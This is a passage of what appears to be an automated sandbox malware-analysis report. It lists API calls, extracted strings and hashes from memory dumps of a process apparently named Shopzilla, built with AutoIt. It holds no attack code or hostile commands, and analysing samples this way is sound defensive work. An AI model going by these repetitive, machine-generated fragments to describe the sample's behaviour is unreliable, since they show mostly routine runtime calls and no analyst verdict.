                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: fcc7bd6d637ecedf96778aed5875d9425eeb7dba7fbb975bbbcecac31c59253c
                                              • Instruction ID: ce2ab06ecff26e1ca4c302a7a7aefa74d3dcb357e25a97bbdd6a8aa8174e040f
                                              • Opcode Fuzzy Hash: fcc7bd6d637ecedf96778aed5875d9425eeb7dba7fbb975bbbcecac31c59253c
                                              • Instruction Fuzzy Hash: 78118C71610218ABEB109F74EC95BFB3B6AEB05368F204724F974975E0C771DC90AB60
                                              APIs
                                              • _memset.LIBCMT ref: 00C03036
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C03055
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: ffcc5e7a20592407d077a3fe1937b84c9b226f18998ca99a5a8e70f172922f52
                                              • Instruction ID: 6ff0f94f8da827ccd9c355adc302eb9e753529ce22b5a5c4c37184fc8009ee2c
                                              • Opcode Fuzzy Hash: ffcc5e7a20592407d077a3fe1937b84c9b226f18998ca99a5a8e70f172922f52
                                              • Instruction Fuzzy Hash: 73110431A02254ABDB20DF9CDC44FADB7BCAB05B0CF140125E825A72E0D770AF04D791
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C126DC
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C12705
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 1bc9ad23ed0e55d69d043dd6257bc330a2abab2542c68cb1f3c429ddd445e353
                                              • Instruction ID: 21db6f3530a6d112eebb6e30ec207d8cc9e2529e6a80bacd91f6c99fd85bd386
                                              • Opcode Fuzzy Hash: 1bc9ad23ed0e55d69d043dd6257bc330a2abab2542c68cb1f3c429ddd445e353
                                              • Instruction Fuzzy Hash: 5311E378541229BBDB248F518C85EFBFBA8FB13351F10412AF95542180E27069E4EAF0
                                              APIs
                                                • Part of subcall function 00C184A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C18265,?,00000000,?,?), ref: 00C184BF
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C18268
                                              • htons.WSOCK32(00000000,?,00000000), ref: 00C182A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: 33675610b841ba82dce35dad958c1d8e5a74ab9d2f7993309d40831a9e2101cb
                                              • Instruction ID: 49c0a59cc2aa60b354057d8b8e373c465ca080a0d7cea0f890597aa3f9b37263
                                              • Opcode Fuzzy Hash: 33675610b841ba82dce35dad958c1d8e5a74ab9d2f7993309d40831a9e2101cb
                                              • Instruction Fuzzy Hash: B611E175604219ABDB10EF64CC46FFEB3A4FF01320F208556FA21972D1DB71A948DA91
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BFB57D: GetClassNameW.USER32(?,?,000000FF), ref: 00BFB5A0
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BF980E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 6ac94203f38ac5f5e2f71baa6c7400e108a4077bfb20e192e81cd917104b9f9d
                                              • Instruction ID: 7f8bae28b0e617ba311457d173e9e2bb20325424e48de5754ed6d88ee74ddde1
                                              • Opcode Fuzzy Hash: 6ac94203f38ac5f5e2f71baa6c7400e108a4077bfb20e192e81cd917104b9f9d
                                              • Instruction Fuzzy Hash: 4501F571A4121CAB8B14EBA4CC61DFE77E9EF123A0B500699F971672C1DF31580CC750
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: 08be6b815dcf407ad9a0c4b8730e9e875359bc121a72f4b02bbcc7b209bba754
                                              • Instruction ID: 8fc211bb27c4aa09ba0fe6314e4ae9fc588ee06e4b7f2fc0fe57811a712f63a9
                                              • Opcode Fuzzy Hash: 08be6b815dcf407ad9a0c4b8730e9e875359bc121a72f4b02bbcc7b209bba754
                                              • Instruction Fuzzy Hash: F901B971D04258BEDF28CAA8CC5AFAE7BF8DB15311F00419FF552D6181E575A648CB60
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BFB57D: GetClassNameW.USER32(?,?,000000FF), ref: 00BFB5A0
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BF9706
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 964b8efb858690f15a96de1677f4b5a7720c5e6f18f97c9531013ab656ae2ca7
                                              • Instruction ID: ab3b4e7984070b0f4ec311f6fd01afd63d5ec4409d38b5984b8ea2070888f759
                                              • Opcode Fuzzy Hash: 964b8efb858690f15a96de1677f4b5a7720c5e6f18f97c9531013ab656ae2ca7
                                              • Instruction Fuzzy Hash: 9E01D4B5A4110CABCB14EBA4C862FFF77E8DF11300F5001A5B911A72C1DE555E0C96B1
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00BFB57D: GetClassNameW.USER32(?,?,000000FF), ref: 00BFB5A0
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BF9789
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 46c62f09668c6b9c85349fd4d34d2fefa18677e09457bfc112b558be7cd0da44
                                              • Instruction ID: b8febe754c27d1cf18738e6c328482f552a9a4915b1ae8b93561304ab4ed1232
                                              • Opcode Fuzzy Hash: 46c62f09668c6b9c85349fd4d34d2fefa18677e09457bfc112b558be7cd0da44
                                              • Instruction Fuzzy Hash: 78018FB5A5120CAB8B14EBA4C962FFFB7E8DB11340BA00195B915A3281DB655E0C9671
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: cc4f5a2b2e04c09317d537071a1ab6febb90bdb00a342cc5dcf3ec322981c9cb
                                              • Instruction ID: 32eee7c44639c22c3c82cdb27a0404613f70e81a4f5a0850ea8c10458a72a245
                                              • Opcode Fuzzy Hash: cc4f5a2b2e04c09317d537071a1ab6febb90bdb00a342cc5dcf3ec322981c9cb
                                              • Instruction Fuzzy Hash: 26E09B7260422867D72096559C05F9BF7ECDB55761F0001A6FD04D3151E5A06A558BD4
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BF8683
                                                • Part of subcall function 00BC34BA: _doexit.LIBCMT ref: 00BC34C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: c14a9f5b7e33994cdc0a6087a61518f298ebbed3af80495a68026dee1091ee3a
                                              • Instruction ID: ac48164568de60a8088dd190c680cf72707ffb04c4af081fe9035429718f1fc2
                                              • Opcode Fuzzy Hash: c14a9f5b7e33994cdc0a6087a61518f298ebbed3af80495a68026dee1091ee3a
                                              • Instruction Fuzzy Hash: 53D05B3239531837E2153695AC1BFDE7AC88B05B51F2444B9BF04E61C34ED989D441E9
                                              APIs
                                                • Part of subcall function 00BDB474: _memset.LIBCMT ref: 00BDB481
                                                • Part of subcall function 00BC0A9F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BDB450,?,?,?,00BA100A), ref: 00BC0AA4
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BDB454
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BDB463
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BDB45E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: 5b0c8242271a1d71a8f43a08ee2f7bcf4de36375fa48a297dac5ed39e957e23a
                                              • Instruction ID: dbf77487ec775fc3897b12aae45b2151121fa7f28a000f7f7c62bcd171dd511b
                                              • Opcode Fuzzy Hash: 5b0c8242271a1d71a8f43a08ee2f7bcf4de36375fa48a297dac5ed39e957e23a
                                              • Instruction Fuzzy Hash: 62E06DB0210751CBD730EF25E814B46BAE4AF04704F1189AEE496C2752E7B5D504CB91
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00BDFFC1
                                                • Part of subcall function 00C1C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,00BE01AA,?), ref: 00C1C4AF
                                                • Part of subcall function 00C1C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C1C4C1
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00BE01B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: 0574325881d29eb0acc0484b091e28c5c23bf42760382b8517d9e11ff50e1ec3
                                              • Instruction ID: 246c4f98429c2c47e63a6b8935303c8f89465bdc745093b72a08ae626635f537
                                              • Opcode Fuzzy Hash: 0574325881d29eb0acc0484b091e28c5c23bf42760382b8517d9e11ff50e1ec3
                                              • Instruction Fuzzy Hash: 74F0A57581E11ADBCB15DB91D9E8BFCBBF8AB09304F2400D6E142A2290DB719F84DF20
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C25DB3
                                              • PostMessageW.USER32(00000000), ref: 00C25DBA
                                                • Part of subcall function 00C0566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C056E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: c7d1639f1738295008f1cf135e89bd7c4a65e86ecb0a1481539727f9db603da3
                                              • Instruction ID: f45c0a619da367844ec4d22dd1baf5dcf85b9c03e978061bfa90dab4e22b65e3
                                              • Opcode Fuzzy Hash: c7d1639f1738295008f1cf135e89bd7c4a65e86ecb0a1481539727f9db603da3
                                              • Instruction Fuzzy Hash: FBD0C936394B11ABF664A7709C1BFDB6624AB44B51F140865B685EA1E1C9E06840CA58
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C25D73
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C25D86
                                                • Part of subcall function 00C0566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C056E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 943620326803d5ebb321a7e397487683dea0d7e13ba0702e13adb6f1f372f8cf
                                              • Instruction ID: 51da8887c3837195bb96c36d0c9bbeee57dcedadabff2cf063250e15e7b8581d
                                              • Opcode Fuzzy Hash: 943620326803d5ebb321a7e397487683dea0d7e13ba0702e13adb6f1f372f8cf
                                              • Instruction Fuzzy Hash: 74D0C936398B11ABE664A7709C1BFDB6A24AB40B51F140865B685AA1E1C9E05840CA54